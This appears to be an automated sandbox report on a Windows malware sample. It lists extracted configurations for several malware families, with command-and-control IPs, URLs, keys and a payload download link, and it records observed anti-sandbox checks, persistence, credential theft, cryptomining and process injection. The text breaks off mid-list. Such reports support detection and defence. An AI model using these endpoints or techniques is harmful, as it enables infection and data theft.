Analysis
-
max time kernel
105s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 23:11
Static task
static1
Behavioral task
behavioral1
Sample
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
Resource
win10v2004-20250217-en
General
-
Target
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
-
Size
3.1MB
-
MD5
05a60f8d98d695238a1f15a04c7a8d2b
-
SHA1
661a23849abf6b2cbc9a8542ffe2765461034a36
-
SHA256
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
-
SHA512
f9452772bf6c8897313271c5ab68d9e3800b70b06320c60aada7d7862955fbd35e4d0ac6ee633a3b45942ce389a9e5793c84e732b6d220d4197ec0420ebed089
-
SSDEEP
24576:fi+WCexr+xCbnKF3s/jda8rwcyoF0M1gfQizlp9e3JSbEW3mNkRWgOmgT+kAcFsD:fKqQbnKts/j08rwA/gQ34oUt5S7n8
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
45.154.98.175:6969
uGmGtmYAbzOi1F41
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023d0c-94.dat family_xworm behavioral2/memory/3296-106-0x0000000000B20000-0x0000000000B30000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5292-907-0x0000000000CB0000-0x0000000001108000-memory.dmp healer behavioral2/memory/5292-908-0x0000000000CB0000-0x0000000001108000-memory.dmp healer behavioral2/memory/5292-999-0x0000000000CB0000-0x0000000001108000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
Stealc family
-
Systembc family
-
Xmrig family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 82ce3de40e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ffd8234368.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 250c1f6b4d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 860be6c356.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ abfjdu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8e014fc6f7.exe -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/4912-334-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-335-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-343-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-349-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-347-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-346-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-348-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-345-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-363-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-380-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-404-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-470-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-471-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig behavioral2/memory/4912-499-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 48 4960 powershell.exe 66 2132 powershell.exe 76 4236 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Powershell Invoke Web Request.
pid Process 4960 powershell.exe 6040 powershell.exe 5836 powershell.exe 3928 powershell.exe 2720 powershell.exe 1612 powershell.exe 2080 powershell.exe 4960 powershell.exe 2132 powershell.exe 4236 powershell.exe 6040 powershell.exe -
Downloads MZ/PE file 18 IoCs
flow pid Process 47 2816 rapes.exe 47 2816 rapes.exe 47 2816 rapes.exe 47 2816 rapes.exe 47 2816 rapes.exe 47 2816 rapes.exe 92 4236 BitLockerToGo.exe 98 2816 rapes.exe 98 2816 rapes.exe 98 2816 rapes.exe 98 2816 rapes.exe 98 2816 rapes.exe 119 4624 BitLockerToGo.exe 66 2132 powershell.exe 76 4236 powershell.exe 39 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 53 1012 Gxtuum.exe 135 2456 250c1f6b4d.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000a000000023dca-1282.dat net_reactor behavioral2/memory/6740-1353-0x0000000000BB0000-0x0000000000C10000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 82ce3de40e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 250c1f6b4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ffd8234368.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 250c1f6b4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 860be6c356.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion abfjdu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8e014fc6f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 82ce3de40e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 860be6c356.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ffd8234368.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion abfjdu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8e014fc6f7.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation PcAIvJ0.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation nhDLtPT.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation rapes.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs powershell.exe -
Executes dropped EXE 23 IoCs
pid Process 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 2816 rapes.exe 2348 PcAIvJ0.exe 1488 nhDLtPT.exe 1012 Gxtuum.exe 3296 cnntXtU.exe 1812 vertualiziren.exe 3928 840fb92a2b.exe 4640 TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE 448 483d2fa8a0d53818306efeb32d3.exe 1936 ffd8234368.exe 4784 cc8fa31301.exe 3800 cc8fa31301.exe 1032 cc8fa31301.exe 3324 Gxtuum.exe 4760 abfjdu.exe 1612 rapes.exe 2644 8e014fc6f7.exe 1032 82ce3de40e.exe 2456 250c1f6b4d.exe 4432 860be6c356.exe 3816 SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe 4532 07d2efa8fe.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 250c1f6b4d.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 860be6c356.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine vertualiziren.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine abfjdu.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 8e014fc6f7.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 82ce3de40e.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine ffd8234368.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\860be6c356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\860be6c356.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07d2efa8fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\07d2efa8fe.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" cnntXtU.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\840fb92a2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\840fb92a2b.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 77 pastebin.com 78 pastebin.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023d12-132.dat autoit_exe behavioral2/files/0x0007000000023d63-536.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5872 tasklist.exe 4904 tasklist.exe 1964 tasklist.exe 1700 tasklist.exe 3996 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 2816 rapes.exe 1812 vertualiziren.exe 4640 TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE 448 483d2fa8a0d53818306efeb32d3.exe 1936 ffd8234368.exe 4760 abfjdu.exe 1612 rapes.exe 2644 8e014fc6f7.exe 1032 82ce3de40e.exe 2456 250c1f6b4d.exe 4432 860be6c356.exe 3816 SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4784 set thread context of 1032 4784 cc8fa31301.exe 136 PID 1936 set thread context of 4236 1936 ffd8234368.exe 141 PID 3380 set thread context of 4912 3380 Explorer.EXE 140 PID 2644 set thread context of 4624 2644 8e014fc6f7.exe 152 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe File created C:\Windows\Tasks\rapes.job 15IU9MAI67GYH0XHEXQP4VKU7HW.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 644 4784 WerFault.exe 134 3720 4300 WerFault.exe 202 6888 6740 WerFault.exe 221 -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abfjdu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e014fc6f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc8fa31301.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc8fa31301.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 07d2efa8fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 860be6c356.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 250c1f6b4d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 07d2efa8fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 840fb92a2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffd8234368.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 15IU9MAI67GYH0XHEXQP4VKU7HW.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 82ce3de40e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 07d2efa8fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4840 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4860 taskkill.exe 2724 taskkill.exe 4748 taskkill.exe 3060 taskkill.exe 1692 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3108 schtasks.exe 4812 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 2816 rapes.exe 2816 rapes.exe 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 1812 vertualiziren.exe 1812 vertualiziren.exe 3296 cnntXtU.exe 3296 cnntXtU.exe 2132 powershell.exe 2132 powershell.exe 2132 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 2720 powershell.exe 2720 powershell.exe 3928 powershell.exe 2720 powershell.exe 1612 powershell.exe 1612 powershell.exe 1612 powershell.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe 4640 TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE 4640 TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE 4236 powershell.exe 4236 powershell.exe 4236 powershell.exe 448 483d2fa8a0d53818306efeb32d3.exe 448 483d2fa8a0d53818306efeb32d3.exe 1936 ffd8234368.exe 1936 ffd8234368.exe 1032 cc8fa31301.exe 1032 cc8fa31301.exe 1032 cc8fa31301.exe 1032 cc8fa31301.exe 3380 Explorer.EXE 3380 Explorer.EXE 4760 abfjdu.exe 4760 abfjdu.exe 1612 rapes.exe 1612 rapes.exe 2644 8e014fc6f7.exe 2644 8e014fc6f7.exe 3380 Explorer.EXE 3380 Explorer.EXE 1032 82ce3de40e.exe 1032 82ce3de40e.exe 1032 82ce3de40e.exe 1032 82ce3de40e.exe 1032 82ce3de40e.exe 1032 82ce3de40e.exe 2456 250c1f6b4d.exe 2456 250c1f6b4d.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 3296 cnntXtU.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 4236 powershell.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 4784 cc8fa31301.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeLockMemoryPrivilege 4912 notepad.exe Token: SeLockMemoryPrivilege 4912 notepad.exe Token: SeDebugPrivilege 1964 tasklist.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 1700 tasklist.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 3996 tasklist.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 1692 taskkill.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 